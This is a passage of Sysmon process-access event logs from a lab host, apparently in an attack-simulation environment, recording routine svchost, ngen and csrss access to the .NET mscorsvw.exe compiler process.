C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.773","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010E07E0B00}","TargetProcessId":"2704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6997,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.804\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-001004820B00}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.804","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-001004820B00}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6998,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.804\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-001004820B00}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.804","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-001004820B00}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6999,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.820\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-001004820B00}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.820","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-001004820B00}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7000,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.976\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010AB850B00}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.976","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010AB850B00}","TargetProcessId":"2996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7001,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.976\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010AB850B00}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.976","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010AB850B00}","TargetProcessId":"2996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7002,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.992\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010AB850B00}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.992","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010AB850B00}","TargetProcessId":"2996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7003,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.007\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-0010A4880B00}\r\nTargetProcessId: 5056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.007","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-0010A4880B00}","TargetProcessId":"5056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\